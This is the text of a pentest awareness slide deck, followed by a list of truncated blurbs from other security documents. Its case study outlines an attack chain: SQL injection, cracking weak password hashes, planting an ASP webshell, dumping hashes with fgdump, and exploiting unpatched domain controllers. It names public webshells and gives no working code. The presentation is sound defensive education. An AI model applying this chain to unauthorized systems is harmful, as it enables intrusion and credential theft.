3 What is a pentest? Simulation of a real attack on: Infrastructure by exploiting badly designed firewall rules, exposed services,... Exposed Web applications by testing user inputs, application bugs, Mainly from two point of view: Blackbox, without information about the remote infrastructure, just a URL Greybox, with a user account Various purposes: Security assessment Decision makers awareness Technical staff awareness 3/28

5 Security assessment (2/3) Pentest should not to be mistaken with vulnerability scanning or vulnerability assessment. Vulnerability scanning (Qualys, Rapid7, Nessus...) is cheap and automated but : Results are not confirmed by a human assessor Does not necessarily prove that a vulnerability is there and actually exploitable (lots of 'might/could be vulnerable' in reports) Can not look for for tricky vulnerabilities in web applications in an efficient and useful way Can not bounce (from a compromised system to a vulnerable one) to prove that more systems are at risk Has no notion of business risk (all vulnerabilities considered the same) Are tools for regulatory and compliance, but not the ones used by hackers to penetrate systems This presentation is about real pentests, simulating real-world attacks 5/28

8 Decision makers awareness Pentests are not relevant only to technical staff Decision makers want to know: Do we have vulnerabilities? Are they easy to exploit? Are they easy to fix? How good (or bad) are they related to other similar companies? 8/28

9 Case study Single information provided to the pentesters : 9/28

10 At first sight > 10/28

11 Guessing the infrastructure... 11/28

12 After browsing for a few minutes 12/28

13 What does it look like now? 13/28

14 SQL Injection issue Possibility to extract database information: Using a custom script No sensitive information on such a website Except for the user accounts authorized to edit content Demonstration 14/28

15 In the vulnerabilities summary... Looks like an SQL injection flaw! 15/28

16 Weak passwords policy Retrieved accounts passwords are encrypted To be precise : they are 'hashed' ('one-way encryption') If some of them are simple: They can be retrieved! Demonstration 16/28

19 No filtering on file extensions (2/2) Instead of uploading an image: Let's upload an executable ASP script Which can act as an interface to the operating system Public webshells are easy to found (c99.php, r57.php, ) HSC consultants developed their own webshell Demonstration 19/28

20 In the vulnerabilities summary... 20/28

21 Where are we now? 21/28

22 Bounce to the SQL Server LocalSystem user can extract hashes from the system Public tools exist (fgdump.exe) But also private tools (forestdump for HSC) Such hashes can be broken Using 'Rainbow tables' If a local account is shared accross servers: We can bounce to them! Demonstration 22/28

23 In the vulnerabilities summary... 23/28

24 Where are we now? 24/28

25 Compromising the Active Directory Domain controllers can be identified by querying a DNS record $ dig _ldap._tcp.dc._msdcs.hsc.local [...] ;; ANSWER SECTION: _ldap._tcp.dc._msdcs.hsc.local. 600 IN SRV win2003-ad.hsc.local. ;; ADDITIONAL SECTION: win2003-ad.hsc.local IN A If a critical vulnerability hasn't yet been patched: It can be exploited to take control of the system MS (netapi), MS (netapi), MS10-46 (LNK),... Demonstration 25/28

26 In the vulnerabilities summary... 26/28

27 Where are we now? 27/28

28 Conclusion Increasing number of attacks against web applications A vulnerability can be created by mistake very quickly : Unfiltered user inputs, weak passwords, unpatched software Exploitation techniques are now mature Impact can be disastrous : Leak of confidential data Servers and applications compromised or vandalized Pentests make you aware of the issues before the real hackers... 28/28

1 ITEC441- IS Security Chapter 15 Performing a Penetration Test The PenTest A penetration test (pentest) simulates methods that intruders use to gain unauthorized access to an organization s network and

A Division Penetration Testing //Vulnerability Assessment //Remedy In Penetration Testing, part of a security assessment practice attempts to simulate the techniques adopted by an attacker in compromising

Tim West Consulting 6807 Wicklow St. Arlington, TX 76002 817-228-3420 Twest@timwestconsulting.com OVERVIEW Tim West Consulting Tim West Consulting is a full service IT security and support firm that specializes

Passing PCI Compliance How to Address the Application Security Mandates The Payment Card Industry Data Security Standards includes several requirements that mandate security at the application layer. These

A Decision Maker s Guide to Securing an IT Infrastructure A Rackspace White Paper Spring 2010 Summary With so many malicious attacks taking place now, securing an IT infrastructure is vital. The purpose

Penetration Testing Service By Consulting February, 2007 Background The number of hacking and intrusion incidents is increasing year by year as technology rolls out. Equally, there is no hiding place your

NETWORK AND CERTIFICATE SYSTEM SECURITY REQUIREMENTS Scope and Applicability: These Network and Certificate System Security Requirements (Requirements) apply to all publicly trusted Certification Authorities

Course Introduction Today Hackers are everywhere, if your corporate system connects to internet that means your system might be facing with hacker. This five days course Professional Vulnerability Assessment

This sample report is published with prior consent of our client in view of the fact that the current release of this web application is three major releases ahead in its life cycle. Issues pointed out

Pentesting for fun... and profit! David M. N. Bryan and Rob Havelt Agenda Who are David & Rob? Why are we experts? Why do penetration tests? What is a penetration test? What is the goal? Some says it s

by Debasis Mohanty (Orissa, India) www.hackingspirits.com Introduction I have been thinking of publishing this paper since long but due to lack of time I was not able to complete it. I use to add and keep

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability WWW Based upon HTTP and HTML Runs in TCP s application layer Runs on top of the Internet Used to exchange

Four Top Emagined Security Services. www.emagined.com Emagined Security offers a variety of Security Services designed to support growing security needs. This brochure highlights four key Emagined Security

Protecting Your Organisation from Targeted Cyber Intrusion How the 35 mitigations against targeted cyber intrusion published by Defence Signals Directorate can be implemented on the Microsoft technology

Agenda 1. Do You Need to Be Concerned? 2. What organizations can do to better protect 3. What you can do personally to better protect 4. Questions 1 Do You Need to Be Concerned? Video Data from September

One of the most important assets any organization possesses is its data Unfortunately, the importance of data is generally underestimated The first steps in data protection actually begin with understanding

TECHNICAL AUDITS FOR CERTIFYING EUROPEAN CITIZEN COLLECTION SYSTEMS Technical audits in accordance with Regulation 211/2011 of the European Union and according to Executional Regulation 1179/2011 of the

INTRUSION DETECTION SYSTEM (IDS) D souza Adam Jerry Joseph 0925910 I MCA OVERVIEW Introduction Overview The IDS Puzzle Current State of IDS Threats I have a good firewall, why do I need an IDS? Expectations

Purpose: The Department of Information Technology (DoIT) is committed to developing secure applications. DoIT s System Development Methodology (SDM) and Application Development requirements ensure that

1 Security Testing & Load Testing for Online Document Management system Abstract The client is a leading provider of online technical documentation solutions in UK, they wanted to protect their documents

FREQUENTLY ASKED QUESTIONS Secure Bytes, October 2011 This document is confidential and for the use of a Secure Bytes client only. The information contained herein is the property of Secure Bytes and may

White Paper What is Penetration Testing? An Introduction for IT Managers What Is Penetration Testing? Penetration testing is the process of identifying security gaps in your IT infrastructure by mimicking

Web Security School Final Exam By Michael Cobb 1.) Which of the following services is not required to run a Windows server solely configured to run IIS and publish a Web site on the Internet? a. IIS Admin

Nessus Exploit Integration v2 Tenable Network Security has committed to providing context around vulnerabilities, and correlating them to other sources, such as available exploits. We currently pull information